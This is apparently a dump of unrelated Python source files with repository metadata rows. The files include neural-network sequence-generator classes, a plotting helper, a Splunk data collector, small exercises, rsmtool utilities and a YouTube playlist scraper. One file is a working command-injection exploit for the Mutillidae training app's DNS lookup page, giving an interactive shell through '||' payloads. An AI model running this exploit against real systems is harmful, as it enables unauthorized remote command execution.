return [state_dict[state_name]
for state_name in self.generate.states]
@initial_states.property('outputs')
def initial_states_outputs(self):
return self.generate.states
@add_metaclass(ABCMeta)
class AbstractReadout(Initializable):
"""The interface for the readout component of a sequence generator.
The readout component of a sequence generator is a bridge between
the core recurrent network and the output sequence.
Parameters
----------
source_names : list
A list of the source names (outputs) that are needed for the
readout part e.g. ``['states']`` or
``['states', 'weighted_averages']`` or ``['states', 'feedback']``.
readout_dim : int
The dimension of the readout.
Attributes
----------
source_names : list
readout_dim : int
See Also
--------
:class:`BaseSequenceGenerator` : see how exactly a readout is used
:class:`Readout` : the typically used readout brick
"""
@lazy(allocation=['source_names', 'readout_dim'])
def __init__(self, source_names, readout_dim, **kwargs):
self.source_names = source_names
self.readout_dim = readout_dim
super(AbstractReadout, self).__init__(**kwargs)
@abstractmethod
def emit(self, readouts):
"""Produce outputs from readouts.
Parameters
----------
readouts : :class:`~theano.Variable`
Readouts produced by the :meth:`readout` method of
a `(batch_size, readout_dim)` shape.
"""
pass
@abstractmethod
def cost(self, readouts, outputs):
"""Compute generation cost of outputs given readouts.
Parameters
----------
readouts : :class:`~theano.Variable`
Readouts produced by the :meth:`readout` method
of a `(..., readout dim)` shape.
outputs : :class:`~theano.Variable`
Outputs whose cost should be computed. Should have as many
or one less dimensions compared to `readout`. If readout has
`n` dimensions, first `n - 1` dimensions of `outputs` should
match with those of `readouts`.
"""
pass
@abstractmethod
def initial_outputs(self, batch_size):
"""Compute initial outputs for the generator's first step.
In the notation from the :class:`BaseSequenceGenerator`
documentation this method should compute :math:`y_0`.
"""
pass
@abstractmethod
def readout(self, **kwargs):
r"""Compute the readout vector from states, glimpses, etc.
Parameters
----------
\*\*kwargs: dict
Contains sequence generator states, glimpses,
contexts and feedback from the previous outputs.
"""
pass
@abstractmethod
def feedback(self, outputs):
"""Feeds outputs back to be used as inputs of the transition."""
pass
class Readout(AbstractReadout):
r"""Readout brick with separated emitter and feedback parts.
:class:`Readout` combines a few bits and pieces into an object
that can be used as the readout component in
:class:`BaseSequenceGenerator`. This includes an emitter brick,
to which :meth:`emit`, :meth:`cost` and :meth:`initial_outputs`
calls are delegated, a feedback brick to which :meth:`feedback`
functionality is delegated, and a pipeline to actually compute
readouts from all the sources (see the `source_names` attribute
of :class:`AbstractReadout`).
The readout computation pipeline is constructed from `merge` and
`post_merge` brick, whose responsibilites are described in the
respective docstrings.
Parameters
----------
emitter : an instance of :class:`AbstractEmitter`
The emitter component.
feedback_brick : an instance of :class:`AbstractFeedback`
The feedback component.
merge : :class:`~.bricks.Brick`, optional
A brick that takes the sources given in `source_names` as an input
and combines them into a single output. If given, `merge_prototype`
cannot be given.
merge_prototype : :class:`.FeedForward`, optional
If `merge` isn't given, the transformation given by
`merge_prototype` is applied to each input before being summed. By
default a :class:`.Linear` transformation without biases is used.
If given, `merge` cannot be given.
post_merge : :class:`.Feedforward`, optional
This transformation is applied to the merged inputs. By default
:class:`.Bias` is used.
merged_dim : int, optional
The input dimension of `post_merge` i.e. the output dimension of
`merge` (or `merge_prototype`). If not give, it is assumed to be
the same as `readout_dim` (i.e. `post_merge` is assumed to not
change dimensions).
\*\*kwargs : dict
Passed to the parent's constructor.
See Also
--------
:class:`BaseSequenceGenerator` : see how exactly a readout is used
:class:`AbstractEmitter`, :class:`AbstractFeedback`
"""
def __init__(self, emitter=None, feedback_brick=None,
merge=None, merge_prototype=None,
post_merge=None, merged_dim=None, **kwargs):
if not emitter:
emitter = TrivialEmitter(kwargs['readout_dim'])
if not feedback_brick:
feedback_brick = TrivialFeedback(kwargs['readout_dim'])
if not merge:
merge = Merge(input_names=kwargs['source_names'],
prototype=merge_prototype)
if not post_merge:
post_merge = Bias(dim=kwargs['readout_dim'])
if not merged_dim:
merged_dim = kwargs['readout_dim']
self.emitter = emitter
self.feedback_brick = feedback_brick
self.merge = merge
self.post_merge = post_merge
self.merged_dim = merged_dim
children = [self.emitter, self.feedback_brick, self.merge,
self.post_merge]
kwargs.setdefault('children', []).extend(children)
super(Readout, self).__init__(**kwargs)
def _push_allocation_config(self):
self.emitter.readout_dim = self.get_dim('readouts')
self.feedback_brick.output_dim = self.get_dim('outputs')
self.merge.input_names = self.source_names
self.merge.input_dims = self.source_dims
self.merge.output_dim = self.merged_dim
self.post_merge.input_dim = self.merged_dim
self.post_merge.output_dim = self.readout_dim
@application
def readout(self, **kwargs):
merged = self.merge.apply(**{name: kwargs[name]
for name in self.merge.input_names})
merged = self.post_merge.apply(merged)
return merged
@application
def emit(self, readouts):
return self.emitter.emit(readouts)
@application
def cost(self, readouts, outputs):
return self.emitter.cost(readouts, outputs)
@application
def initial_outputs(self, batch_size):
return self.emitter.initial_outputs(batch_size)
@application(outputs=['feedback'])
def feedback(self, outputs):
return self.feedback_brick.feedback(outputs)
def get_dim(self, name):
if name == 'outputs':
return self.emitter.get_dim(name)
elif name == 'feedback':
return self.feedback_brick.get_dim(name)
elif name == 'readouts':
return self.readout_dim
return super(Readout, self).get_dim(name)
@add_metaclass(ABCMeta)
class AbstractEmitter(Brick):
"""The interface for the emitter component of a readout.
Attributes
----------
readout_dim : int
The dimension of the readout. Is given by the
:class:`Readout` brick when allocation configuration
is pushed.
See Also
--------
:class:`Readout`
:class:`SoftmaxEmitter` : for integer outputs
Notes
-----
An important detail about the emitter cost is that it will be
evaluated with inputs of different dimensions so it has to be
flexible enough to handle this. The two ways in which it can be
applied are:
1. In :meth:BaseSequenceGenerator.cost_matrix where it will
be applied to the whole sequence at once.
2. In :meth:BaseSequenceGenerator.generate where it will be
applied to only one step of the sequence.
"""
@abstractmethod
def emit(self, readouts):
"""Implements the respective method of :class:`Readout`."""
pass
@abstractmethod
def cost(self, readouts, outputs):
"""Implements the respective method of :class:`Readout`."""
pass
@abstractmethod
def initial_outputs(self, batch_size):
"""Implements the respective method of :class:`Readout`."""
pass
@add_metaclass(ABCMeta)
class AbstractFeedback(Brick):
"""The interface for the feedback component of a readout.
See Also
--------
:class:`Readout`
:class:`LookupFeedback` for integer outputs
"""
@abstractmethod
def feedback(self, outputs):
"""Implements the respective method of :class:`Readout`."""
pass
class TrivialEmitter(AbstractEmitter):
"""An emitter for the trivial case when readouts are outputs.
Parameters
----------
readout_dim : int
The dimension of the readout.
Notes
-----
By default :meth:`cost` always returns zero tensor.
"""
@lazy(allocation=['readout_dim'])
def __init__(self, readout_dim, **kwargs):
super(TrivialEmitter, self).__init__(**kwargs)
self.readout_dim = readout_dim
@application
def emit(self, readouts):
return readouts
@application
def cost(self, readouts, outputs):
return tensor.zeros_like(outputs)
@application
def initial_outputs(self, batch_size):
return tensor.zeros((batch_size, self.readout_dim))
def get_dim(self, name):
if name == 'outputs':
return self.readout_dim
return super(TrivialEmitter, self).get_dim(name)
class SoftmaxEmitter(AbstractEmitter, Initializable, Random):
"""A softmax emitter for the case of integer outputs.
Interprets readout elements as energies corresponding to their indices.
Parameters
----------
initial_output : int or a scalar :class:`~theano.Variable`
The initial output.
"""
def __init__(self, initial_output=0, **kwargs):
self.initial_output = initial_output
self.softmax = NDimensionalSoftmax()
children = [self.softmax]
kwargs.setdefault('children', []).extend(children)
super(SoftmaxEmitter, self).__init__(**kwargs)
@application
def probs(self, readouts):
return self.softmax.apply(readouts, extra_ndim=readouts.ndim - 2)
@application
def emit(self, readouts):
probs = self.probs(readouts)
batch_size = probs.shape[0]
pvals_flat = probs.reshape((batch_size, -1))
generated = self.theano_rng.multinomial(pvals=pvals_flat)
return generated.reshape(probs.shape).argmax(axis=-1)
@application
def cost(self, readouts, outputs):
# WARNING: unfortunately this application method works
# just fine when `readouts` and `outputs` have
# different dimensions. Be careful!
return self.softmax.categorical_cross_entropy(
outputs, readouts, extra_ndim=readouts.ndim - 2)
@application
def initial_outputs(self, batch_size):
return self.initial_output * tensor.ones((batch_size,), dtype='int64')
def get_dim(self, name):
if name == 'outputs':
return 0
return super(SoftmaxEmitter, self).get_dim(name)
class TrivialFeedback(AbstractFeedback):
"""A feedback brick for the case when readout are outputs."""
@lazy(allocation=['output_dim'])
def __init__(self, output_dim, **kwargs):
super(TrivialFeedback, self).__init__(**kwargs)
self.output_dim = output_dim
@application(outputs=['feedback'])
def feedback(self, outputs):
return outputs
def get_dim(self, name):
if name == 'feedback':
return self.output_dim
return super(TrivialFeedback, self).get_dim(name)
class LookupFeedback(AbstractFeedback, Initializable):
"""A feedback brick for the case when readout are integers.
Stores and retrieves distributed representations of integers.
"""
def __init__(self, num_outputs=None, feedback_dim=None, **kwargs):
self.num_outputs = num_outputs
self.feedback_dim = feedback_dim
self.lookup = LookupTable(num_outputs, feedback_dim)
children = [self.lookup]
kwargs.setdefault('children', []).extend(children)
super(LookupFeedback, self).__init__(**kwargs)
def _push_allocation_config(self):
self.lookup.length = self.num_outputs
self.lookup.dim = self.feedback_dim
@application
def feedback(self, outputs):
assert self.output_dim == 0
return self.lookup.apply(outputs)
def get_dim(self, name):
if name == 'feedback':
return self.feedback_dim
return super(LookupFeedback, self).get_dim(name)
class FakeAttentionRecurrent(AbstractAttentionRecurrent, Initializable):
"""Adds fake attention interface to a transition.
:class:`BaseSequenceGenerator` requires its transition brick to support
:class:`~blocks.bricks.attention.AbstractAttentionRecurrent` interface,
that is to have an embedded attention mechanism. For the cases when no
attention is required (e.g. language modeling or encoder-decoder
models), :class:`FakeAttentionRecurrent` is used to wrap a usual
recurrent brick. The resulting brick has no glimpses and simply
passes all states and contexts to the wrapped one.
.. todo::
Get rid of this brick and support attention-less transitions
in :class:`BaseSequenceGenerator`.
"""
def __init__(self, transition, **kwargs):
self.transition = transition
self.state_names = transition.apply.states
self.context_names = transition.apply.contexts
self.glimpse_names = []
children = [self.transition]
kwargs.setdefault('children', []).extend(children)
super(FakeAttentionRecurrent, self).__init__(**kwargs)
@application
def apply(self, *args, **kwargs):
return self.transition.apply(*args, **kwargs)
@apply.delegate
def apply_delegate(self):
return self.transition.apply
@application
def compute_states(self, *args, **kwargs):
return self.transition.apply(iterate=False, *args, **kwargs)
@compute_states.delegate
def compute_states_delegate(self):
return self.transition.apply
@application(outputs=[])
def take_glimpses(self, *args, **kwargs):
return None
@application
def initial_states(self, batch_size, *args, **kwargs):
return self.transition.initial_states(batch_size,
*args, **kwargs)
@initial_states.property('outputs')
def initial_states_outputs(self):
return self.transition.apply.states
def get_dim(self, name):
return self.transition.get_dim(name)
class SequenceGenerator(BaseSequenceGenerator):
r"""A more user-friendly interface for :class:`BaseSequenceGenerator`.
Parameters
----------
readout : instance of :class:`AbstractReadout`
The readout component for the sequence generator.
transition : instance of :class:`.BaseRecurrent`
The recurrent transition to be used in the sequence generator.
Will be combined with `attention`, if that one is given.
attention : object, optional
The attention mechanism to be added to ``transition``,
an instance of
:class:`~blocks.bricks.attention.AbstractAttention`.
add_contexts : bool
If ``True``, the
:class:`.AttentionRecurrent` wrapping the
`transition` will add additional contexts for the attended and its
mask.
\*\*kwargs : dict
All keywords arguments are passed to the base class. If `fork`
keyword argument is not provided, :class:`.Fork` is created
that forks all transition sequential inputs without a "mask"
substring in them.
"""
def __init__(self, readout, transition, attention=None,
add_contexts=True, **kwargs):
normal_inputs = [name for name in transition.apply.sequences
if 'mask' not in name]
kwargs.setdefault('fork', Fork(normal_inputs))
if attention:
transition = AttentionRecurrent(
transition, attention,
add_contexts=add_contexts, name="att_trans")
else:
transition = FakeAttentionRecurrent(transition,
name="with_fake_attention")
super(SequenceGenerator, self).__init__(
readout, transition, **kwargs)
| 35.357388
| 78
| 0.655846
| 28,858
| 0.934914
| 0
| 0
| 14,598
| 0.472932
| 0
| 0
| 15,848
| 0.513429
|
3bad4e23a3beb6bf9c00280bce54c9d434b3e821
| 1,752
|
py
|
Python
|
src/plotComponents2D.py
|
ElsevierSoftwareX/SOFTX-D-21-00108
|
3ae995e7ef2fa2eb706a2f55390d8b53424082af
|
[
"MIT"
] | null | null | null |
src/plotComponents2D.py
|
ElsevierSoftwareX/SOFTX-D-21-00108
|
3ae995e7ef2fa2eb706a2f55390d8b53424082af
|
[
"MIT"
] | null | null | null |
src/plotComponents2D.py
|
ElsevierSoftwareX/SOFTX-D-21-00108
|
3ae995e7ef2fa2eb706a2f55390d8b53424082af
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
def plotComponents2D(X, y, labels, use_markers = False, ax=None, legends = None, tags = None):
if X.shape[1] < 2:
print('ERROR: X MUST HAVE AT LEAST 2 FEATURES/COLUMNS! SKIPPING plotComponents2D().')
return
# Gray shades can be given as a string encoding a float in the 0-1 range
colors = ['0.9', '0.1', 'red', 'blue', 'black','orange','green','cyan','purple','gray']
markers = ['o', 's', '^', 'D', 'H', 'o', 's', '^', 'D', 'H', 'o', 's', '^', 'D', 'H', 'o', 's', '^', 'D', 'H']
if (ax is None):
fig, ax = plt.subplots()
i=0
if (labels is None):
labels = set(y)
for label in labels:
cluster = X[np.where(y == label)]
# print(cluster.shape)
if use_markers:
ax.scatter([cluster[:,0]], [cluster[:,1]],
s=40,
marker=markers[i],
facecolors='none',
edgecolors=colors[i+3],
label= (str(legends[i]) if legends is not None else ("Y = " + str(label))) )
else:
ax.scatter([cluster[:,0]], [cluster[:,1]],
s=70,
facecolors=colors[i],
label= (str(legends[i]) if legends is not None else ("Y = " + str(label))),
edgecolors = 'black',
alpha = .4) # cmap='tab20'
i=i+1
if (tags is not None):
for j,tag in enumerate(tags):
ax.annotate(str(tag), (X[j,0] + 0.1, X[j,1] - 0.1))
ax.legend()
ax.axes.xaxis.set_visible(False)
ax.axes.yaxis.set_visible(False)
| 36.5
| 114
| 0.4629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 350
| 0.199772
|
3bafd74c087e7fcccb34aa701eb50c300c1ce2a1
| 5,541
|
py
|
Python
|
bin/sa_haveibeenpwned/aob_py3/cloudconnectlib/splunktacollectorlib/data_collection/ta_data_collector.py
|
hRun/SA-haveibeenpwned
|
2a8ae3dedc405dc3c8dac1cb6a705a70f574afdb
|
[
"Apache-2.0"
] | 2
|
2020-08-17T07:52:48.000Z
|
2020-12-18T16:39:32.000Z
|
bin/sa_haveibeenpwned/aob_py3/cloudconnectlib/splunktacollectorlib/data_collection/ta_data_collector.py
|
hRun/SA-haveibeenpwned
|
2a8ae3dedc405dc3c8dac1cb6a705a70f574afdb
|
[
"Apache-2.0"
] | 5
|
2020-12-15T23:40:14.000Z
|
2022-02-23T15:43:18.000Z
|
bin/sa_haveibeenpwned/aob_py3/cloudconnectlib/splunktacollectorlib/data_collection/ta_data_collector.py
|
hRun/SA-haveibeenpwned
|
2a8ae3dedc405dc3c8dac1cb6a705a70f574afdb
|
[
"Apache-2.0"
] | 4
|
2019-05-16T09:57:33.000Z
|
2021-07-14T12:31:21.000Z
|
#!/usr/bin/python
from __future__ import absolute_import
from builtins import object
import threading
import time
from collections import namedtuple
from . import ta_consts as c
from ..common import log as stulog
from ...splunktalib.common import util as scu
evt_fmt = ("<stream><event><host>{0}</host>"
"<source><![CDATA[{1}]]></source>"
"<sourcetype><![CDATA[{2}]]></sourcetype>"
"<time>{3}</time>"
"<index>{4}</index><data>"
"<![CDATA[{5}]]></data></event></stream>")
unbroken_evt_fmt = ("<stream>"
"<event unbroken=\"1\">"
"<host>{0}</host>"
"<source><![CDATA[{1}]]></source>"
"<sourcetype><![CDATA[{2}]]></sourcetype>"
"<time>{3}</time>"
"<index>{4}</index>"
"<data><![CDATA[{5}]]></data>"
"{6}"
"</event>"
"</stream>")
event_tuple = namedtuple('Event',
['host', 'source', 'sourcetype', 'time', 'index',
'raw_data', 'is_unbroken', 'is_done'])
class TADataCollector(object):
def __init__(self, tconfig, meta_config, task_config,
checkpoint_manager_cls, data_client_cls, data_loader):
self._lock = threading.Lock()
self._ta_config = tconfig
self._meta_config = meta_config
self._task_config = task_config
self._stopped = False
self._p = self._get_logger_prefix()
self._checkpoint_manager = checkpoint_manager_cls(meta_config,
task_config)
self.data_client_cls = data_client_cls
self._data_loader = data_loader
self._client = None
def get_meta_configs(self):
return self._meta_config
def get_task_config(self):
return self._task_config
def get_interval(self):
return self._task_config[c.interval]
def _get_logger_prefix(self):
pairs = ['{}="{}"'.format(c.stanza_name, self._task_config[
c.stanza_name])]
return "[{}]".format(" ".join(pairs))
def stop(self):
self._stopped = True
if self._client:
self._client.stop()
def __call__(self):
self.index_data()
def _build_event(self, events):
if not events:
return None
if not isinstance(events, list):
events = [events]
evts = []
for event in events:
assert event.raw_data, "the raw data of events is empty"
if event.is_unbroken:
evt = unbroken_evt_fmt.format(
event.host or "", event.source or "", event.sourcetype or
"", event.time or "", event.index or "",
scu.escape_cdata(event.raw_data), "<done/>" if
event.is_done else "")
else:
evt = evt_fmt.format(event.host or "", event.source or "",
event.sourcetype or "", event.time or "",
event.index or "",
scu.escape_cdata(event.raw_data))
evts.append(evt)
return evts
def _create_data_client(self):
return self.data_client_cls(self._meta_config,
self._task_config,
self._checkpoint_manager,
self._data_loader.get_event_writer())
def index_data(self):
if self._lock.locked():
stulog.logger.debug(
"Last round of stanza={} is not done yet".format(
self._task_config[c.stanza_name]))
return
with self._lock:
try:
self._do_safe_index()
self._checkpoint_manager.close()
except Exception:
stulog.logger.exception("{} Failed to index data"
.format(self._p))
stulog.logger.info("{} End of indexing data".format(self._p))
if not self._ta_config.is_single_instance():
self._data_loader.tear_down()
def _write_events(self, events):
evts = self._build_event(events)
if evts:
if not self._data_loader.write_events(evts):
stulog.logger.info("{} the event queue is closed and the "
"received data will be discarded".format(
self._p))
return False
return True
def _do_safe_index(self):
self._client = self._create_data_client()
while not self._stopped:
try:
events = self._client.get()
if not events:
continue
else:
if not self._write_events(events):
break
except StopIteration:
stulog.logger.info("{} Finished this round".format(self._p))
return
except Exception:
stulog.logger.exception("{} Failed to get msg".format(self._p))
break
# in case encounter exception or fail to write events
if not self._stopped:
self.stop()
| 37.693878
| 80
| 0.497203
| 4,344
| 0.783974
| 0
| 0
| 0
| 0
| 0
| 0
| 857
| 0.154665
|
3bb2017aa37b51490a6ff0089cf9d21b31b7addf
| 220
|
py
|
Python
|
basic_assignment/32.py
|
1212091/python-learning
|
30fad66460daf73fd3961cf667ee25b91dee923d
|
[
"MIT"
] | null | null | null |
basic_assignment/32.py
|
1212091/python-learning
|
30fad66460daf73fd3961cf667ee25b91dee923d
|
[
"MIT"
] | null | null | null |
basic_assignment/32.py
|
1212091/python-learning
|
30fad66460daf73fd3961cf667ee25b91dee923d
|
[
"MIT"
] | null | null | null |
class Circle:
def __init__(self, radius):
self.radius = radius
def compute_area(self):
return self.radius ** 2 * 3.14
circle = Circle(2)
print("Area of circuit: " + str(circle.compute_area()))
| 20
| 55
| 0.631818
| 142
| 0.645455
| 0
| 0
| 0
| 0
| 0
| 0
| 19
| 0.086364
|
3bb360a4392cf829c811ffb8e087e7288ebd8630
| 502
|
py
|
Python
|
415.py
|
RafaelHuang87/Leet-Code-Practice
|
7754dcee38ffda18a5759113ef06d7becf4fe728
|
[
"MIT"
] | null | null | null |
415.py
|
RafaelHuang87/Leet-Code-Practice
|
7754dcee38ffda18a5759113ef06d7becf4fe728
|
[
"MIT"
] | null | null | null |
415.py
|
RafaelHuang87/Leet-Code-Practice
|
7754dcee38ffda18a5759113ef06d7becf4fe728
|
[
"MIT"
] | null | null | null |
class Solution:
def addStrings(self, num1: str, num2: str) -> str:
i, j, result, carry = len(num1) - 1, len(num2) - 1, '', 0
while i >= 0 or j >= 0:
if i >= 0:
carry += ord(num1[i]) - ord('0')
if j >= 0:
carry += ord(num2[j]) - ord('0')
result += chr(carry % 10 + ord('0'))
carry //= 10
i -= 1
j -= 1
if carry == 1:
result += '1'
return result[::-1]
| 31.375
| 65
| 0.376494
| 501
| 0.998008
| 0
| 0
| 0
| 0
| 0
| 0
| 14
| 0.027888
|
3bb3f6ef40737ea90a9f45f3effca880da0d4227
| 154
|
py
|
Python
|
lambdata-mkhalil/my_script.py
|
mkhalil7625/lambdata-mkhalil
|
87f74166a3ae4f4cc92733cb5fc0c15e3b32f565
|
[
"MIT"
] | null | null | null |
lambdata-mkhalil/my_script.py
|
mkhalil7625/lambdata-mkhalil
|
87f74166a3ae4f4cc92733cb5fc0c15e3b32f565
|
[
"MIT"
] | null | null | null |
lambdata-mkhalil/my_script.py
|
mkhalil7625/lambdata-mkhalil
|
87f74166a3ae4f4cc92733cb5fc0c15e3b32f565
|
[
"MIT"
] | null | null | null |
import pandas as pd
from my_mod import enlarge
print("Hello!")
df = pd.DataFrame({"a":[1,2,3], "b":[4,5,6]})
print(df.head())
x = 11
print(enlarge(x))
| 14
| 45
| 0.62987
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 14
| 0.090909
|
3bb55e28e639f9add169bf9d74da89f4b5663f84
| 885
|
py
|
Python
|
exploit_mutillidae.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
exploit_mutillidae.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
exploit_mutillidae.py
|
binarioGH/minihacktools
|
664e72ccc54089baa3b4d2ddc28bdcddbfdd1833
|
[
"MIT"
] | null | null | null |
#-*-coding: utf-8-*-
from requests import session
from bs4 import BeautifulSoup
#Aqui pones la ip de tu maquina.
host = "192.168.1.167"
#Aqui pones la ruta de el dns-lookup.php
route = "/mutillidae/index.php?page=dns-lookup.php"
with session() as s:
cmd = ''
while cmd != 'exit':
cmd = input(">>")
payload = "|| {}".format(cmd)
#Mandar el payload al host por medio de un post request.
response = s.post("http://{}{}".format(host, route), data={"target_host": payload})
#Parsear la respuesta con beautiful soup
soup = BeautifulSoup(response.text, "html.parser")
#El output del comando se encuentra en un <pre> con la clase 'report-header'
#Asi que le decimos a beautiful soup que lo encuentre, y que nos de el texto.
command_output = soup.find_all("pre", attrs={"class": "report-header"})[0].get_text()
#Imprimir output del comando
print(command_output)
| 32.777778
| 87
| 0.692655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 514
| 0.580791
|
3bb5cf6df03cde1b36d438f6ec362fdce3a55254
| 101
|
py
|
Python
|
submissions/abc085/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 1
|
2021-05-10T01:16:28.000Z
|
2021-05-10T01:16:28.000Z
|
submissions/abc085/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 3
|
2021-05-11T06:14:15.000Z
|
2021-06-19T08:18:36.000Z
|
submissions/abc085/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | null | null | null |
# sys.stdin.readline()
import sys
input = sys.stdin.readline
print(input().replace('2017', '2018'))
| 16.833333
| 38
| 0.70297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.336634
|
3bb6a612c41a6fc405f13a76e25386f09fd4787a
| 4,069
|
py
|
Python
|
rsmtool/utils/files.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
rsmtool/utils/files.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
rsmtool/utils/files.py
|
MarcoGorelli/rsmtool
|
8759f5bec09a8ba0dd2ca16f6af8ce100d5ea6a0
|
[
"Apache-2.0"
] | null | null | null |
"""
Utility classes and functions for RSMTool file management.
:author: Jeremy Biggs (jbiggs@ets.org)
:author: Anastassia Loukina (aloukina@ets.org)
:author: Nitin Madnani (nmadnani@ets.org)
:organization: ETS
"""
import json
import re
from glob import glob
from pathlib import Path
from os.path import join
from .constants import POSSIBLE_EXTENSIONS
def parse_json_with_comments(pathlike):
"""
Parse a JSON file after removing any comments.
Comments can use either ``//`` for single-line
comments or or ``/* ... */`` for multi-line comments.
The input filepath can be a string or ``pathlib.Path``.
Parameters
----------
filename : str or os.PathLike
Path to the input JSON file either as a string
or as a ``pathlib.Path`` object.
Returns
-------
obj : dict
JSON object representing the input file.
Note
----
This code was adapted from:
https://web.archive.org/web/20150520154859/http://www.lifl.fr/~riquetd/parse-a-json-file-with-comments.html
"""
# Regular expression to identify comments
comment_re = re.compile(r'(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
re.DOTALL | re.MULTILINE)
# if we passed in a string, convert it to a Path
if isinstance(pathlike, str):
pathlike = Path(pathlike)
with open(pathlike, 'r') as file_buff:
content = ''.join(file_buff.readlines())
# Looking for comments
match = comment_re.search(content)
while match:
# single line comment
content = content[:match.start()] + content[match.end():]
match = comment_re.search(content)
# Return JSON object
config = json.loads(content)
return config
def has_files_with_extension(directory, ext):
"""
Check if the directory has any files with the given extension.
Parameters
----------
directory : str
The path to the directory where output is located.
ext : str
The the given extension.
Returns
-------
bool
True if directory contains files with given extension,
else False.
"""
files_with_extension = glob(join(directory, '*.{}'.format(ext)))
return len(files_with_extension) > 0
def get_output_directory_extension(directory, experiment_id):
"""
Check the output directory to determine what file extensions
exist. If more than one extension (in the possible list of
extensions) exists, then raise a ValueError. Otherwise,
return the one file extension. If no extensions can be found, then
`csv` will be returned by default.
Possible extensions include: `csv`, `tsv`, `xlsx`. Files in the
directory with none of these extensions will be ignored.
Parameters
----------
directory : str
The path to the directory where output is located.
experiment_id : str
The ID of the experiment.
Returns
-------
extension : {'csv', 'tsv', 'xlsx'}
The extension that output files in this directory
end with.
Raises
------
ValueError
If any files in the directory have different extensions,
and are in the list of possible output extensions.
"""
extension = 'csv'
extensions_identified = {ext for ext in POSSIBLE_EXTENSIONS
if has_files_with_extension(directory, ext)}
if len(extensions_identified) > 1:
raise ValueError('Some of the files in the experiment output directory (`{}`) '
'for `{}` have different extensions. All files in this directory '
'must have the same extension. The following extensions were '
'identified : {}'.format(directory,
experiment_id,
', '.join(extensions_identified)))
elif len(extensions_identified) == 1:
extension = list(extensions_identified)[0]
return extension
| 29.70073
| 111
| 0.616368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,550
| 0.62669
|
3bbaa7105c8bdb5d9e446a53505849bc8d258fd0
| 2,479
|
py
|
Python
|
src/aiotube/playlist.py
|
jnsougata/AioTube
|
719bc52e442d06f922ada65da7650cfb92a0f237
|
[
"MIT"
] | 4
|
2021-10-02T07:01:22.000Z
|
2021-12-30T08:27:36.000Z
|
src/aiotube/playlist.py
|
jnsougata/AioTube
|
719bc52e442d06f922ada65da7650cfb92a0f237
|
[
"MIT"
] | 2
|
2021-11-18T20:21:39.000Z
|
2021-12-27T17:12:17.000Z
|
src/aiotube/playlist.py
|
jnsougata/AioTube
|
719bc52e442d06f922ada65da7650cfb92a0f237
|
[
"MIT"
] | 3
|
2021-10-01T03:21:33.000Z
|
2021-12-21T20:49:30.000Z
|
from ._threads import _Thread
from .utils import filter
from .videobulk import _VideoBulk
from ._http import _get_playlist_data
from ._rgxs import _PlaylistPatterns as rgx
from typing import List, Optional, Dict, Any
class Playlist:
__HEAD = 'https://www.youtube.com/playlist?list='
def __init__(self, playlist_id: str):
"""
:param str playlist_id: the _id of the playlist
"""
if 'youtube.com' in playlist_id:
self.id = playlist_id.split('list=')[-1]
else:
self.id = playlist_id
self.__playlist_data = _get_playlist_data(self.id)
def __repr__(self):
return f'<Playlist {self.url}>'
@property
def name(self) -> Optional[str]:
"""
:return: the name of the playlist
"""
names = rgx.name.findall(self.__playlist_data)
return names[0] if names else None
@property
def url(self) -> Optional[str]:
"""
:return: url of the playlist
"""
return f'https://www.youtube.com/playlist?list={self.id}'
@property
def video_count(self) -> Optional[str]:
"""
:return: total number of videos in that playlist
"""
video_count = rgx.video_count.findall(self.__playlist_data)
return video_count[0] if video_count else None
@property
def videos(self) -> _VideoBulk:
"""
:return: list of < video objects > for each video in the playlist (consider limit)
"""
videos = rgx.video_id.findall(self.__playlist_data)
return _VideoBulk(filter(iterable=videos))
@property
def thumbnail(self) -> Optional[str]:
"""
:return: url of the thumbnail of the playlist
"""
thumbnails = rgx.thumbnail.findall(self.__playlist_data)
return thumbnails[0] if thumbnails else None
@property
def info(self) -> Dict[str, Any]:
"""
:return: a dict containing playlist info
"""
def _get_data(pattern):
data = pattern.findall(self.__playlist_data)
return data[0] if data else None
patterns = [rgx.name, rgx.video_count, rgx.thumbnail]
data = _Thread.run(_get_data, patterns)
return {
'name': data[0],
'video_count': data[1],
'videos': filter(rgx.video_id.findall(raw)),
'url': self.__HEAD + self.id,
'thumbnail': data[2]
}
| 27.853933
| 90
| 0.592981
| 2,251
| 0.908027
| 0
| 0
| 1,750
| 0.70593
| 0
| 0
| 668
| 0.269463
|
3bbaf9656983dcec4f85d013784da058e74250a8
| 160
|
py
|
Python
|
actions/sleep.py
|
bhaveshAn/Lucy
|
9ea97184c725a10a041af64cad0ef4b533be42ad
|
[
"MIT"
] | 1
|
2018-04-13T08:26:27.000Z
|
2018-04-13T08:26:27.000Z
|
actions/sleep.py
|
bhaveshAn/Lucy
|
9ea97184c725a10a041af64cad0ef4b533be42ad
|
[
"MIT"
] | null | null | null |
actions/sleep.py
|
bhaveshAn/Lucy
|
9ea97184c725a10a041af64cad0ef4b533be42ad
|
[
"MIT"
] | null | null | null |
import random
def go_to_sleep(text):
replies = ['See you later!', 'Just call my name and I\'ll be there!']
return (random.choice(replies))
quit()
| 20
| 73
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 55
| 0.34375
|
3bbc9e86460d1c4a98d44711f0b944fd26bd0864
| 441
|
py
|
Python
|
django_sso_app/core/api/utils.py
